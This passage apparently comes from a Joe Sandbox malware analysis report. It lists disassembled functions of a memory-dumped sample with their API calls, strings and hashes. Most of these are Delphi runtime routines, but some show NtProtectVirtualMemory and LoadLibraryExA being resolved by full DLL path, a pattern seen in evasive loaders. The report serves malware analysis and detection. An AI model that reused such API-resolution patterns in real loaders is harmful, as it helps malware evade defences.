                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleMemoryModuleProcProtectVirtual
                                                                                                                              • String ID: C:\Windows\System32\ntdll.dll$NtProtectVirtualMemory
                                                                                                                              • API String ID: 1550029230-1386159242
                                                                                                                              • Opcode ID: 90591f22956c196b4b1a74670a8b416062c07ed21b13690b7fa7a6cd5aee1f95
                                                                                                                              • Instruction ID: 7cf9c6c98b1f710dc06ea7dd283c6ee97b23285563b425f091f117c176ff8baf
                                                                                                                              • Opcode Fuzzy Hash: 90591f22956c196b4b1a74670a8b416062c07ed21b13690b7fa7a6cd5aee1f95
                                                                                                                              • Instruction Fuzzy Hash: CEE04FBE58020CAF9B40DEACDC81D8B37DCAB082007006405BA18D3305C670E9218F75
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A7F8E Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 028A7FB1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: DiskFreeSpace
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1705453755-0
                                                                                                                              • Opcode ID: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
                                                                                                                              • Instruction ID: 87107804d636e5dd30f9ca3e9f410b2c44f759b8976a5eea7a115a1a17367d84
                                                                                                                              • Opcode Fuzzy Hash: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
                                                                                                                              • Instruction Fuzzy Hash: 331112B5E00209AFDB00CF9DC881DAFF7F9EFC8300B14C569A408E7254E6319E018B90
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AA780 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028AA79E
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoLocale
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2299586839-0
                                                                                                                              • Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                              • Instruction ID: 1ab93f5926b48356a2c382d9e4378168de0618033a0ff84b75e5f7024526b3c7
                                                                                                                              • Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                              • Instruction Fuzzy Hash: 3CE0D87D70021817E714A55C5CA09F7726DA75C710F04417EBD49C7341EEE09D408AE5
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AB748 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetVersionExA.KERNEL32(?,028CA106,00000000,028CA11E), ref: 028AB756
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Version
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1889659487-0
                                                                                                                              • Opcode ID: bdd8063706ace15bb6887713df2b5cd07b5cadac913393fddfe800cb073e36f9
                                                                                                                              • Instruction ID: ab363ecf34b525c6e2499b1d677ef046c44ffbb0d5b93ac4e9ee07ce2238987f
                                                                                                                              • Opcode Fuzzy Hash: bdd8063706ace15bb6887713df2b5cd07b5cadac913393fddfe800cb073e36f9
                                                                                                                              • Instruction Fuzzy Hash: 19F0B2BC944B019FE790DF28E45262577E5FB88718F248D3DE898C7380EB7498248F92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AA7CC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,028ABE2E,00000000,028AC047,?,?,00000000,00000000), ref: 028AA7DF
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: InfoLocale
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2299586839-0
                                                                                                                              • Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                              • Instruction ID: 675aae88e52e70492b453d27b230ccd0d226e3bf760e8ad5af0de73724a516a0
                                                                                                                              • Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                              • Instruction Fuzzy Hash: 54D05E6E30E2A43AB224915E2DA4DBB5AFCCAC57A1F04443EB988C6201E6008C06D6B1
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A91C8 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: LocalTime
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 481472006-0
                                                                                                                              • Opcode ID: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                              • Instruction ID: b65c66b4548049ce115804527f489826efcdbc3eb32495d15bccc906e0659a24
                                                                                                                              • Opcode Fuzzy Hash: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                              • Instruction Fuzzy Hash: 12A01208404831019540371C0C0213530445800620FC8074068F8802D5FD1D012440D3
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                              • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                              • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                              • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AD250 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 028AD259
                                                                                                                                • Part of subcall function 028AD224: GetProcAddress.KERNEL32(00000000), ref: 028AD23D
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressHandleModuleProc
                                                                                                                              • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                              • API String ID: 1646373207-1918263038
                                                                                                                              • Opcode ID: 62491741b168e3ae01d2e5621cb6f8f2894e10c977a109e0c82882e47775259c
                                                                                                                              • Instruction ID: 80f433dd607f2f4b39ac727d279d194cc3e1c27db2b61fcc38365f1de655731a
                                                                                                                              • Opcode Fuzzy Hash: 62491741b168e3ae01d2e5621cb6f8f2894e10c977a109e0c82882e47775259c
                                                                                                                              • Instruction Fuzzy Hash: 1941516DA492089F73186B6D747003B77DAEB497103A5940AF614DBF08DDB0FC5ACE2A
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028B6E94 Relevance: 24.5, APIs: 7, Strings: 7, Instructions: 32libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleA.KERNEL32(ole32.dll), ref: 028B6E9A
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoCreateInstanceEx), ref: 028B6EAB
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 028B6EBB
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoAddRefServerProcess), ref: 028B6ECB
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoReleaseServerProcess), ref: 028B6EDB
                                                                                                                              • GetProcAddress.KERNEL32(00000000,CoResumeClassObjects), ref: 028B6EEB
                                                                                                                              • GetProcAddress.KERNEL32 ref: 028B6EFB
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: AddressProc$HandleModule
                                                                                                                              • String ID: CoAddRefServerProcess$CoCreateInstanceEx$CoInitializeEx$CoReleaseServerProcess$CoResumeClassObjects$CoSuspendClassObjects$ole32.dll
                                                                                                                              • API String ID: 667068680-2233174745
                                                                                                                              • Opcode ID: 81398e79dc2a122ddfda1e8ffde288f303358d382ca6f471b0ad4b4de3b39f11
                                                                                                                              • Instruction ID: e886f32683aa086337ca41a267a47c077b33bdfc22944067740ebc9ec7d20e86
                                                                                                                              • Opcode Fuzzy Hash: 81398e79dc2a122ddfda1e8ffde288f303358d382ca6f471b0ad4b4de3b39f11
                                                                                                                              • Instruction Fuzzy Hash: BDF082BC9CB7746DBA016B3C1C9786A274D9E0160835C281DB066E5F47FF7884204F21
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028BA058 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 102libraryloaderCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004,?,00000014), ref: 028BA078
                                                                                                                              • GetModuleHandleW.KERNEL32(C:\Windows\System32\KernelBase.dll,LoadLibraryExA,?,00000004,?,00000014), ref: 028BA08F
                                                                                                                              • GetProcAddress.KERNEL32(00000000,C:\Windows\System32\KernelBase.dll), ref: 028BA095
                                                                                                                              • LoadLibraryExA.KERNELBASE(?,00000000,00000000), ref: 028BA0A7
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000004), ref: 028BA123
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000002,?,00000004), ref: 028BA12F
                                                                                                                              • IsBadReadPtr.KERNEL32(?,00000014), ref: 028BA143
                                                                                                                              Strings
                                                                                                                              • LoadLibraryExA, xrefs: 028BA085
                                                                                                                              • C:\Windows\System32\KernelBase.dll, xrefs: 028BA08A
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Read$AddressHandleLibraryLoadModuleProc
                                                                                                                              • String ID: C:\Windows\System32\KernelBase.dll$LoadLibraryExA
                                                                                                                              • API String ID: 2083169754-1650066521
                                                                                                                              • Opcode ID: 81a76273f37c253a72937a22d548da497ea2e5ecdb719e3572e8d2f035bef4e7
                                                                                                                              • Instruction ID: e63d9a068fc35c9d9fad7090539d6eb1acd1eb024c6c207e427ebd2b1b9aa36f
                                                                                                                              • Opcode Fuzzy Hash: 81a76273f37c253a72937a22d548da497ea2e5ecdb719e3572e8d2f035bef4e7
                                                                                                                              • Instruction Fuzzy Hash: FD314D7DA40319BBEB65DF6CCC81F9A77ACAF05354F084518EA19EB381E734E9408B61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A2530 Relevance: 17.8, APIs: 1, Strings: 9, Instructions: 254windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • MessageBoxA.USER32(00000000,?,Unexpected Memory Leak,00002010), ref: 028A28CE
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Message
                                                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $String$The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak$Unknown
                                                                                                                              • API String ID: 2030045667-32948583
                                                                                                                              • Opcode ID: 1052feadf3aa4f53380d6c95bccef69f0c6b6c13f9ad3882bc1d8b9165cfb6c8
                                                                                                                              • Instruction ID: 5adc1c687a721d3ea96f6b9ffb67fd3468c90d7a2849ed2d85071e75971a31d5
                                                                                                                              • Opcode Fuzzy Hash: 1052feadf3aa4f53380d6c95bccef69f0c6b6c13f9ad3882bc1d8b9165cfb6c8
                                                                                                                              • Instruction Fuzzy Hash: 19A1063CA042688BFB319A2CCCA0B9976E5EB09314F1441E5ED4DDB38ACF759985CF51
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A252E Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 188COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              • An unexpected memory leak has occurred. , xrefs: 028A2690
                                                                                                                              • The sizes of unexpected leaked medium and large blocks are: , xrefs: 028A2849
                                                                                                                              • , xrefs: 028A2814
                                                                                                                              • The unexpected small block leaks are:, xrefs: 028A2707
                                                                                                                              • Unexpected Memory Leak, xrefs: 028A28C0
                                                                                                                              • bytes: , xrefs: 028A275D
                                                                                                                              • 7, xrefs: 028A26A1
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: $ bytes: $7$An unexpected memory leak has occurred. $The sizes of unexpected leaked medium and large blocks are: $The unexpected small block leaks are:$Unexpected Memory Leak
                                                                                                                              • API String ID: 0-2723507874
                                                                                                                              • Opcode ID: afb389735a054145ef7a3aa59289765221e050fda787fb48a6ed3c8e43f33d0e
                                                                                                                              • Instruction ID: 4e962c1a84d557b3a1c74a7f8a5624c3133be887c3086d346d3e31c657be47cf
                                                                                                                              • Opcode Fuzzy Hash: afb389735a054145ef7a3aa59289765221e050fda787fb48a6ed3c8e43f33d0e
                                                                                                                              • Instruction Fuzzy Hash: DB71E43CA042588FEB319A2CCC94BD9B6E5EB09714F1040E5E94DD7289DF754AC5CF52
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028ABD7C Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 201threadCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetThreadLocale.KERNEL32(00000000,028AC047,?,?,00000000,00000000), ref: 028ABDB2
                                                                                                                                • Part of subcall function 028AA780: GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028AA79E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Locale$InfoThread
                                                                                                                              • String ID: AMPM$:mm$:mm:ss$AMPM $m/d/yy$mmmm d, yyyy
                                                                                                                              • API String ID: 4232894706-2493093252
                                                                                                                              • Opcode ID: 60bac495d1a8e6efb63abd73616d2ac6fbaebcb16eeaa8d93fd73ed939039d36
                                                                                                                              • Instruction ID: d848477f78b7a38c64dd53566b33ec618dc91d1b5752bb205f2ab30ed7e894d5
                                                                                                                              • Opcode Fuzzy Hash: 60bac495d1a8e6efb63abd73616d2ac6fbaebcb16eeaa8d93fd73ed939039d36
                                                                                                                              • Instruction Fuzzy Hash: 0061313CB011889BFB04EBACD8B0A9F77BB9B48300F109835D601DB745DE75D9499B96
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028A4320 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028A43E7,?,?,029047C8,?,?,028CB7A8,028A6575,028CA305), ref: 028A4359
                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028A43E7,?,?,029047C8,?,?,028CB7A8,028A6575,028CA305), ref: 028A435F
                                                                                                                              • GetStdHandle.KERNEL32(000000F5,028A43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028A43E7,?,?,029047C8), ref: 028A4374
                                                                                                                              • WriteFile.KERNEL32(00000000,000000F5,028A43A8,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,?,00000000,?,028A43E7,?,?), ref: 028A437A
                                                                                                                              • MessageBoxA.USER32(00000000,Runtime error at 00000000,Error,00000000), ref: 028A4398
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: FileHandleWrite$Message
                                                                                                                              • String ID: Error$Runtime error at 00000000
                                                                                                                              • API String ID: 1570097196-2970929446
                                                                                                                              • Opcode ID: 790141cd225c82ba55a746b9852e8bec553ce21a678120023ded749672928304
                                                                                                                              • Instruction ID: 510c6cfabde25cede2eef580ec3b9bb87b4f85f5ac951f3ddede33aeb2525fab
                                                                                                                              • Opcode Fuzzy Hash: 790141cd225c82ba55a746b9852e8bec553ce21a678120023ded749672928304
                                                                                                                              • Instruction Fuzzy Hash: 2EF0BB6CEC47487DFE10A3F86C6EF69275C5744B25F244629B618D50C58FF440C49B23
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AAE80 Relevance: 10.6, APIs: 7, Instructions: 56filewindowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 028AACF8: VirtualQuery.KERNEL32(?,?,0000001C), ref: 028AAD15
                                                                                                                                • Part of subcall function 028AACF8: GetModuleFileNameA.KERNEL32(?,?,00000105), ref: 028AAD39
                                                                                                                                • Part of subcall function 028AACF8: GetModuleFileNameA.KERNEL32(028A0000,?,00000105), ref: 028AAD54
                                                                                                                                • Part of subcall function 028AACF8: LoadStringA.USER32(00000000,0000FFE9,?,00000100), ref: 028AADEA
                                                                                                                              • CharToOemA.USER32(?,?), ref: 028AAEB7
                                                                                                                              • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000,?,?), ref: 028AAED4
                                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028AAEDA
                                                                                                                              • GetStdHandle.KERNEL32(000000F4,028AAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028AAEEF
                                                                                                                              • WriteFile.KERNEL32(00000000,000000F4,028AAF44,00000002,?,00000000,00000000,000000F4,?,00000000,?,00000000,?,?), ref: 028AAEF5
                                                                                                                              • LoadStringA.USER32(00000000,0000FFEA,?,00000040), ref: 028AAF17
                                                                                                                              • MessageBoxA.USER32(00000000,?,?,00002010), ref: 028AAF2D
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: File$HandleLoadModuleNameStringWrite$CharMessageQueryVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 185507032-0
                                                                                                                              • Opcode ID: 893d02a848dd77fc8226bc8296a501c1d6db71b13f6c81cbb7d090a00cb6c8ec
                                                                                                                              • Instruction ID: c90e2cc2ba0b7b1469b0ecf1947d4f199866de0a99c9c4b5f463950c12cbf1ff
                                                                                                                              • Opcode Fuzzy Hash: 893d02a848dd77fc8226bc8296a501c1d6db71b13f6c81cbb7d090a00cb6c8ec
                                                                                                                              • Instruction Fuzzy Hash: 2A114CBE5582086EF704EAACCC91F9E73EDAB44700F440A25B764D60A5EE74E9448F27
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 028AE548 Relevance: 9.1, APIs: 6, Instructions: 139COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SafeArrayGetLBound.OLEAUT32(?,00000001,?), ref: 028AE5E1
                                                                                                                              • SafeArrayGetUBound.OLEAUT32(?,00000001,?), ref: 028AE5FD
                                                                                                                              • SafeArrayCreate.OLEAUT32(0000000C,?,?), ref: 028AE636
                                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(?,?,?), ref: 028AE6B3
                                                                                                                              • SafeArrayPtrOfIndex.OLEAUT32(00000000,?,?), ref: 028AE6CC
                                                                                                                              • VariantCopy.OLEAUT32(?,00000000), ref: 028AE701
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000000.00000002.2028105526.00000000028A1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028A0000, based on PE: true
                                                                                                                              • Associated: 00000000.00000002.2028083587.00000000028A0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000000.00000002.2028220797.00000000028CB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_0_2_28a0000_XY2I8rWLkM.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 351091851-0
                                                                                                                              • Opcode ID: a9a696700a5c398af6b49de9a61da99d4f96f00f59c5a2cf8b5ab96da2f16d4b
                                                                                                                              • Instruction ID: bd3c7274b8db48017c681746352a578103835e747e039db9b0dc7db716e13c64
